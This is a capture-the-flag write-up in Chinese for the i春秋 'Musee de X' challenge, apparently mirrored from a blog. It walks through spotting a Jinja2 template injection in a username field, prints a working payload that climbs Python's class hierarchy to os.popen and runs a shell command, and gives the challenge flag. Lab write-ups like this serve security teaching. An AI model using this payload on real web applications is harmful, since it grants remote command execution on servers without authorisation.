zoukankan      html  css  js  c++  java
  • i春秋Musee de X

    打开提示我们如果要操作就需要登录

    题目也没有给出tips提示

    /tmp/memes/wosun

    注册成功后提示我们我们的文件被储存在了。。。。。可能这道题会用到一句话木马,毕竟他目录都给我们了

    然后去login.php界面登录试试,登录成功后告诉我们点击here的超链接去捐献我们的财富,如果我们什么都没有就让我们出去。。。。然后是退出登录的超链接

    试试点here会出现什么

    又是一个表单填写的窗口

     随意写一个地址,填上我们注册的usernamego一下

     

     出现一大堆报错

     

     据此信息是jinjia2模板

    而我们的用户名在text中,似乎就可以注入了

    先注册用户名为({{前面的可以随意修改,注册成自己的用户名吧)

    wosun{{''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals['linecache'].__dict__['os'].__dict__['popen']('cat flag*').read()}}

    然后登录

    捐献照片为底色为黑色的网络照片

    http://pic4.bbzhi.com/jingxuanbizhi/heisediannaozhuomianbizhixiazai/heisediannaozhuomianbizhixiazai_362061_5.jpg

    这里给出一张

    然后go一下就看到flag

     flag{13460551-92a3-ed4f-844d-86f8f12ca99c}

     

     

  • 相关阅读:
    shell遍历文件夹并执行命令
    安装PIL的坑
    iptables不小心把127.0.0.1封了,导致redis连不上
    python读取中文
    不要在基类析构函数中调用纯虚函数,否则运行时会报错“pure virtual method called”
    阿里云64位centos6.3系统上编译安装redis
    Git
    Easy Mock
    Sortable
    几个框架
  • 原文地址:https://www.cnblogs.com/wosun/p/11527795.html
Copyright © 2011-2022 走看看